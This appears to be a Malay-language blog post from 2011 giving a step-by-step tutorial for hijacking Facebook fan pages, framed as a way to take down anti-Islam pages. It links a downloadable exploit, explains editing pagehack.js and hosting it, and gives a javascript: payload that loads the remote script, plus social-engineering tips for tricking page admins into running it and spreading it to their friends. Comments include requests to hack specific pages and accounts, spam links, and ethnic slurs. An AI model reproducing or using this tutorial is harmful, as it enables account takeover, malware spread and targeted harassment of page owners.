Support!! Tlglah Click (^_^)

ZomBa!!

Expect Us!!

Monday, October 3, 2011

Special Post!!!! Tutorial Cara Hack Facebook Fan!!


Click LIKE To Share With Your Friends!!! "n" Don't Forget To Leave a Comment!! Chill (^_^)








Assalamualaikum!!!! Special Post Utk Ajar cam Ne Nak Hack Facebook Fan Page.. Tujuan Aku ajar Bkn Utk Wat Jahat tapi utk Kita same2 Membasmi Page2 Anti Islam o Page yg X Berpekdah.. So Slamat Blajar n Slamat Mencuba (^_^)



cara-cara:

1-mula2 download exploit ni.. http://www.ziddu.com/download/15452226/HackPagesAtfacebook.rar.html

2-pas download,korg kne edit exploit tu pakai notepad++..leh download kat sni http://notepad-plus-plus.org/download/v5.9.3.html

3-bukak file pagehack.js dgn mggunakan notepad++..pastu cari pkataan  wamiqali@hackersthirst.com dan gantikan dgn emel yg korg guna untuk login facebook korg..nk sng tkan je CTRL+F pastu find emel yg td tu...

4-ok,skarg cari pkataan  Learn Hacking and Get free softwares: http://hackersthirst.com & tukar dgn teks korg sendiri..bg pngetahuan korg,teks ini akan dihantar ke wall 15 rakan fb admin page yg korg hack td..(tips:praktikkan social engineering n save nama file td tu dgn name yg mnarik supaya 15 rakan fb admin page td tu akan klik link yg korg bg td tu..contohnye PokerCheats.js..

5-skarg korg kne download script ni ke server..korg leh pakai 0fess.net atau 000webhost.com(t35 & 110mb xleh dguna) pastu upload kat root webhosting korg..lau webhost tu x jadi,korg try la webhosting lain k..ade bnyk,just google jep..ok,skarg link script korg akan jadi mcm ni www.yoursite.0fess.net/PokerCheats.js

6-OK,SKARG PART YG PALING PENTING! korg kne mintak admin page yg korg nk hack td tu paste code ni kat browser dyorg mse dyorg ngah on9 facebook..yg tu korg kne pandai2 la pakai social engineering,aku ase aku x perlu ajar smue kot..ni code yg admin page tu kne ltak kat browser dye n tkan enter

code =
javascript:(a = (b = document).createElement(“script”)).src = “// www.yoursite.0fess.net/PokerCheats.js “, b.body.appendChild(a); void(0)

7-jgn lupe tukar link www.yoursite.0fess.net/PokerCheats.js kpd link korg sndiri k..

~pas2 ni lau korg jmpe mne2 page yg menghina Islam atau Malaysia,korg pandai2 la praktikkan k & pas dh hack page tu jgn lpe lak nak ltak name WAPFM skali..hehe n_n~

P\s: Ko Hack Aku, Aku Hack Ko Hua Hua Hua

Credit To: We Are Programer From Malaysia!! And
My Group: Sambal Group!!!

36 comments:

  1. urm nak copy code tu xlew la...

    ReplyDelete
  2. salam...g
    ua mmg suker kat hackers yg berhati-perut baik-hati nie.... nie la baru dikatakan menyumbang idea & kepakaran.... CONGRATs laaa....salam!

    ReplyDelete
  3. Code 2 semua dah adew dalam Exploit 2 (^_^) Thankz bro Zeppelin..

    ReplyDelete
  4. tenkiu... ^^ ngehhee...

    http://bulatmata.blogspot.com/

    ReplyDelete
  5. thank la...tak salah nak hack kot ,lebih2 lagi nak cover orang islam balik..thniah,bangga dapat follow sni..^^

    *laknat bagi siapa yang hina agama islam..

    ReplyDelete
  6. Trima Kasih (^_^) Bnyak Page Anti Islam Skang Neyh Huhu So Kita Semua Kna Kerjasama utk Basmi Diowang Neyh!!!

    ReplyDelete
  7. nak tinggal jejak kat sini blh?

    Noobster HC

    ReplyDelete
  8. abg. yg no5 tu cube abg explain agi skali. x faham la.

    ReplyDelete
    Replies
    1. more explanation for no 5.
      1. korang kena memiliki webhosting sendiri. webhosting ada yang berbayar dan ada juga offer free. let's start with free hosting!.
      2.google saja,- free webhosting - and give you thousand result about it, but i suggest you to try 000webhost.com.
      3.lepas dah memiliki webhost sendiri tu, UPLOAD file korang ke root webhost tersebut. cara upload adalah menggunakan FTP - file transfer protocol. easy and free FTP client sila try - winSCP -
      kalau masih tak faham, dipersilakan untuk bertanya. :)

      Delete
  9. Rameii gak yg Xfaham No 5 tue.. xpelah t aku wat Tutorial Video lak (^_^) hehe tungguuuu...

    ReplyDelete
  10. okey , dah ciap video tu bgi tau .

    ReplyDelete
  11. huhuh aq pon x paam no 5 tuh ^__^ wat tutorial video tuh cpt skit okey but jgn wat no5 jew wat full steps dari no1 sampai abiz baru paam...^_^
    "L0VE ISLAM"

    ReplyDelete
  12. huhuhu aq bace blik smula x paam lak no4 ngn 5 T_T help help!!!
    "L0VE ISLAM"

    ReplyDelete
  13. Tuan blog,
    Tau tak macam mana nak hack fb acc orang? :)

    ReplyDelete
  14. MALAYSIA ANJING,,,, KAYA BABI KALIAN SEMUA
    FUCK FROM INDONESIA

    ReplyDelete
  15. Thx yah walaupun gua kurang ngerti bahasa loe tapi terima kasih atas ilmunya ..
    mungkin orang yang mengirim komentar diatas hanya orang bodoh dari indonesia ..

    From : Indonesia ^_^

    ReplyDelete
  16. thank yah buat ilmu nya
    walaupun ga ngerti bhasanya
    bner kata di atas gw
    ga usah di ladeni orang yg ada di comment no 18
    itu hanya orang kampung yang tak mengerti apa"

    ReplyDelete
  17. Artikelnya bagus & menarik banget bro..dtunggu nie apdetan berikutnya..
    Maaf numpang lewat, barangkali ada yg prlu pmbuatan blog,Website,tokoonline,forum, silahkan singgah di www.masterweb.cu.cc/ murah-mulai-30.rbuan..
    Thanks

    ReplyDelete
  18. Cara Hack FB Cuma 5 menitJanuary 11, 2013 at 1:45 AM

    Thanks inponya gan..
    I like this...
    Sempat muter2 di gugle...akhirnya jumpa juga tutor hack fb dengan simpel banget.mau? Mampir ya ke www.dilarangmasuk.vv.si/

    ReplyDelete
  19. https://www.facebook.com/fp.katakantidakpadaislam?fref=ts

    TOLONG HACK PAGE NE...HINA ISLAM DIA...BIKIN BACHAT

    ReplyDelete
  20. https://www.facebook.com/groups/356513180365/

    tlg bg grup ni kt admin asal dia@sape2..tmpt org blljr psal elektrik..xpun tlg jdikan open grup n xpyh admin apprve utk org lain join..

    tq

    ReplyDelete
  21. dah download tp byk virus la plak.. :(

    ReplyDelete
  22. asal ade virus nie bro?? lu mau control email kami ke ape nie,,

    ReplyDelete
  23. Salam..abg dya nk minx tlong blh? Page sya kna hack...blh x abg tlong hack blik? Sya nk blik page sya..blh?

    ReplyDelete
  24. Salam..abg dya nk minx tlong blh? Page sya kna hack...blh x abg tlong hack blik? Sya nk blik page sya..blh?

    ReplyDelete
  25. Salam..abg dya nk minx tlong blh? Page sya kna hack...blh x abg tlong hack blik? Sya nk blik page sya..blh?

    ReplyDelete
  26. Gk jelas lu islam anjing

    ReplyDelete
  27. Murtads in malaysia byk yg mhina islam

    ReplyDelete
  28. This comment has been removed by the author.

    ReplyDelete

Jom Jom Tinggalkan Komen anda (^_^)

Support!! Tlglah Click (^_^)

LinkWithin

Related Posts Plugin for WordPress, Blogger...